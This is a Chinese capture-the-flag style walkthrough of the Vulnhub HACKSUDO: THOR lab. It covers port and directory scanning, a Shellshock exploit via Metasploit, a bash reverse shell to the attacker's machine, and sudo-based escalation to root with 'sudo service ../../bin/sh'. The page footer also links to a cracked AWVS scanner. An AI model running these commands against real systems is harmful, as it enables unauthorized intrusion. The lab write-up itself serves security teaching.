Vulnhub_HACKSUDO: THOR
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关
主机信息
kali:192.168.3.39
nivek:192.168.3.38
信息收集
使用nmap探测目标主机发现只开放了21、22、80三个端口
nmap -T4 -A -v -p- 192.168.3.38
访问80端口发现是一个登录页面
查看了网页中的源码没有发现可用的信息
在About-Us中得到了一些联系方式
通过目录扫描发现了一个cgi-bin的目录
dirb http://192.168.3.38 /usr/share/wordlists/dirb/big.txt
然后扫描cgi-bin下的可执行脚本,发现一个shell.sh
dirb http://192.168.3.38/cgi-bin/ -X .sh
GETSHELL
我们利用msf的检测模块验证存在shellshok漏洞
然后利用攻击模块获取shell
查看获取的shell权限发现是www权限
通过bash将msf的shell反弹到本机
bash -c 'bash -i >& /dev/tcp/192.168.3.39/4444 0>&1'
执行sudo -l发现有一个脚本可以以thor用户无密码用root身份执行
然后我们用python获取一个tty shell
python3 -c 'import pty; pty.spawn("/bin/bash");'
接着以thor身份执行脚本
获取thor身份的shell
获取thor的tty shell
提权
再执行sudo -l发现有cat、service可以利用
使用service提权至root
sudo service ../../bin/sh
进入root查看flag
加入我的星球
下方查看历史文章
VulnHub之DC-1
VulnHub之DC-2
VulnHub之DC-3
VulnHub之DC-4
VulnHub之MuzzyBox
【工具分享】AWVS 12 汉化破解版
通达OA任意上传&文件包含漏洞复现
扫描二维码
获取更多精彩
NowSec
Vulnhub_HACKSUDO: THOR相关推荐
- PlugX变体已经悄悄更改源代码且正式更名为THOR
在2021年3月监测Microsoft Exchange Server攻击时,Unit 42研究人员就发现了一个PlugX变体,该变体是作为漏洞利用后远程访问工具 (RAT) 传送到其中一台受感染服务 ...
- 【CodeForces - 705C】Thor(模拟,STLset优化链表)
题干: Thor is getting used to the Earth. As a gift Loki gave him a smartphone. There are n application ...
- THOR:MindSpore 自研高阶优化器源码分析和实践应用
摘要:这篇文章跟大家分享下THOR的实践应用.THOR算法的部分内容当前已经在MindSpore中开源 本文分享自华为云社区<MindSpore 自研高阶优化器源码分析和实践应用>,原文作 ...
- Mac电脑高效办公必备武器——雷神Thor
今天给使用Mac电脑的小伙伴分享一个高效办公利器--Thor,如果你的触摸板和快捷键玩的很6的话,在配上这个软件,那工作效率简直可以起飞! Thor是一款免费的MAC应用程序开启 /切换工具. 通过它 ...
- Thor UI - 轻量简洁的免费开源移动端 UI 组件库,支持原生小程序和 uni-app
用来快速开发原生小程序或者通过 uni-app 来开发任何小程序甚至是 APP 的组件库,但我很好奇中文名是不是译作雷神 UI. Thor UI 介绍 Thor UI 是一款开发移动端网页应用.小程序 ...
- 百度App性能优化工具篇 - Thor原理及实践
01 背景 App开发过程中,如果遇到一些疑难问题或者性能问题(如低端机卡顿),由于没法拿到更多系统的有效信息很难有效定位.这时,Hook不失为一种好的解决方案,Hook技术是在程序运行的过程中,动态 ...
- 2022 极术通讯-从NVIDIA自动驾驶芯片Thor,看大芯片的发展趋势
导读:极术社区与E-learning平台联合推出极术通讯,引入行业媒体和技术社区.咨询机构优质内容,定期分享产业技术趋势与市场应用热点. 芯方向 超级嵌入式系统"性能/时间"工具箱 ...
- thor修改html,f4thor修改工具[thor规则解包打包] | 贝贝吧
软件简介 f4thor修改工具一款简单易用thor规则过滤器文件修改工具,可以一键解包打包f4thor文件,支持一键去除.修改权限. 食用说明 文件管理 导入方式 文件导入方式为拖入一个f4thor或 ...
- ruby中Thor用法雷神介绍,MyCLI < Thor详细介绍
作者:小白蒋,个人博客:www.nihao070.cn ruby中thor详细用法 ruby中Thor是什么? 第一点:公共方法变成命令 第二点:你也可以使用Ruby的可选参数使CLI参数可选 第三点 ...
最新文章
- 必看,经典sql面试题(学生表_课程表_成绩表_教师表)
- 成功解决SyntaxError: (unicode error) ‘unicodeescape‘ codec can‘t decode bytes in position 6-7: malformed
- 浏览器上网 (Safari Chrome)
- gearman服务连接php,Gearman异步服务安装使用
- jquery多维对象计算个数_多维尺度分析理论概述
- javac compiling error ( mising package)
- mac笔记本修改 mysql 的密码
- 打破双亲委派么,怎么打破_快速行动,不要打破事物
- IEEE发布AI三原则:机器人革命中需要保护人类福祉 | 138页报告
- arm linux系统启动流程
- Android实时打印kernel和App log(两种方法)
- 威纶通触摸屏与2台台达温控器modbus rtu 通讯程序
- 05_家谱管理系统(小钱版)[数据结构][2012-02-03]
- 程序上线【起飞检查清单】-让事故和教训转变为实用的清单
- PDF软件推荐——Sumatra PDF - imsoft.cnblogs
- 大白菜pe安装服务器系统安装教程视频教程,大白菜u盘启动盘制作工具安装系统的详细方法...
- WPF 可视化树和逻辑树
- Docker系列文-----Docker的网络类型(4)
- 使用python爬取12306上面所有车次数据
- alt.js 使用教程